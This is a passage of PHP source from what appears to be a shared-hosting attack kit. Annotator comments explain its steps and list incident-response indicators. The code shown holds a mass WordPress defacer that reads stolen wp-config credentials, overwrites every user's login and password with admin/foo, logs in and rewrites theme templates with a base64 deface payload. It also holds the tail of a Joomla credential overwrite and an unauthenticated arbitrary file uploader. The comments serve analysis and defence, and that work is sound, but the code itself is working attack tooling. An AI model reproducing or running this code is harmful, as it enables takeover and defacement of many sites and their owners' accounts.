				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 
color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 
fail</font></td>';
			}
			
			}
			
			
			}
			#########
			
			
		}
	}
}
}


break;
################MASS DEFACE
// ---- ?do=wp_def : "Wp Mass Defacer" ----
// Hard-codes the credentials admin/foo, then for every cPanel account whose wp-config.php is exposed via ./pee:
//   1. repeats the unqualified credential overwrite from pass_change (every user row -> admin/foo) and reads
//      the site's URL from the <prefix>options 'home' row;
//   2. logs in to <site>/wp-login.php through CurlPage() with log=admin&pwd=foo (cookies kept in ./COOKIE.txt);
//   3. opens wp-admin/theme-editor.php, picks the 404.php / archive.php / comment.php template links of the
//      active theme, extracts the _wpnonce and file name from each editor page, and POSTs action=update with
//      newcontent = a short-tag PHP stub that base64-decodes and prints the operator-supplied page and exits;
//   4. appends the resulting .../wp-content/themes/<theme>/404.php URL to ./wp.txt.
// The deface page itself is fetched server-side from an operator-supplied URL (file_get_contents on
// $_POST['deface_page']), i.e. the compromised host makes the outbound request.
// IR indicators: theme template files that consist of "<? echo(stripslashes(base64_decode('...'))); exit; ?>";
// POST theme-editor.php action=update entries in the victim site's access log coming from this server's IP
// with a browser UA; ./wp.txt and ./COOKIE.txt next to this script; wp_users rows all named "admin".
case 'wp_def':


################### USER & PASS ################
$user = 'admin';
$pass = 'foo';
################################################

echo <<<PEE
<div align="center">
<form action="" method="POST">

<label>Deface URL: </label> <input type="text" style="width:450px;" name="deface_page"><br />
<input type="submit" value="DEFACE">
</form>

PEE;

if($_POST){ 
$deface = file_get_contents(trim($_POST['deface_page']));   // server-side fetch of the operator's deface page

if(is_readable("/var/named"))
{
	
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>';
	$list = scandir("/var/named");
	foreach($list as $domain){
	if(strpos($domain,".db"))
	{
		$domain = str_replace('.db','',$domain);
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
		$url = 'http://'.$domain;
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
		{ 
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				$hash = crypt($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				// Same unqualified UPDATEs as pass_change: every WordPress user becomes admin/foo.
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				
				error_reporting(0);
				
				
		echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="green">[#] 
User Pass Changed </font><br>';
		// Login form fields for wp-login.php with the credentials just planted.
		$post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1';
		// Payload written into the theme template: decodes and prints the deface page, then exits so the
		// rest of the theme never renders. str_replace("'","'") is a no-op.
		$def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."'))); 
exit; ?>";
		$buffer0 = CurlPage($site_url.'/wp-login.php',$post);
		
		// A "logout" link in the response is taken as proof of a logged-in dashboard.
		if(!preg_match("/logout/i",$buffer0))
		{
			echo "<font color='red'>[X] FAILED TO LOGIN</font><br />";
		}else{
		echo "<font color='green'>[#] LOGGED IN :D</font><br>";
		$urlz = $site_url."/wp-admin/theme-editor.php";
		$themeditor = CurlPage($urlz,$cookie,null);   // $cookie is never assigned: plain GET, response headers off
		
		if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened<br /></td>"; } else { echo "error 
opening theme edtitor!</td>"; }
			
		$nola = explode(Chr(10),$themeditor);

		// Collect editor links for the three targeted templates: (404.php) => theme-editor.php?file=... link.
		foreach($nola as $nline){
		if(preg_match('%theme-editor\.php\?file=%',$nline) && 
preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
		$modify[Find($nline,'(',')')] = Find($nline,'<a href="','"');
		}
		}
		
		echo '<td>';
		if(is_array($modify)){
		foreach($modify as $met=>$indfile){
		$nri = str_replace('.','_',$met);
		$nri = "n".$nri;
		$indfile =str_replace("&amp;","&",$indfile);
		$url = trim($site_url."/wp-admin/".$indfile);
		$themepage = CurlPage($url,"");
		// CSRF nonce and canonical file name are scraped from the editor page so the update POST is accepted.
		$_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
		$_file = Find($themepage,'name="file" value="','"');
		$nfile = explode('themes',$_file);
		$jfile = $site_url."/wp-content/themes".end($nfile);
		//Update file
		$url = $site_url."/wp-admin/theme-editor.php";
		$postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
		$themedied = CurlPage($url,$postme);
		if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
		
		// Theme slug is recovered from the 404 template link; only the 2010/2011 default themes get a
		// special-cased name, which dates this kit.
		$theme = Find($themeditor,'<li><a href="theme-editor.php?file=404.php&amp;theme=','">404 Template');
		if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; }
		elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";}
		$theme = trim(str_replace("/","",$theme));
		$d =  $site_url.'/wp-content/themes/'.$theme.'/404.php';
		listall("wp.txt",$d.Chr(10));   // ./wp.txt accumulates the defaced URLs
		}
      	}
		
		echo '<a href='.$d.'>LINK</a><br />';   // $d is only set when an update succeeded; otherwise stale or empty
		echo '</td>';
		
		}}
		########################END DEFACE#################

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">[x] 
mysql fail</font></td>';
			}
		}}}}}
			
		
		

break;
// Uploader
// ---- ?do=uploader ----
// Unauthenticated arbitrary file upload: the uploaded file is copied into the script's cwd under the
// client-supplied file name. Any visitor who discovers this page can drop further payloads next to it,
// so during IR, list every file in this directory by mtime, not only the ones this kit names itself.
case 'uploader':

echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" 
value="Upload"></form></center>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana" 
size="1"><font color="white"> Done !!</font><br>'; }
	else { echo '<font color="#FF0000">Failed :( </font></p>
	</td></table></tr>
'; }
}


}}
?>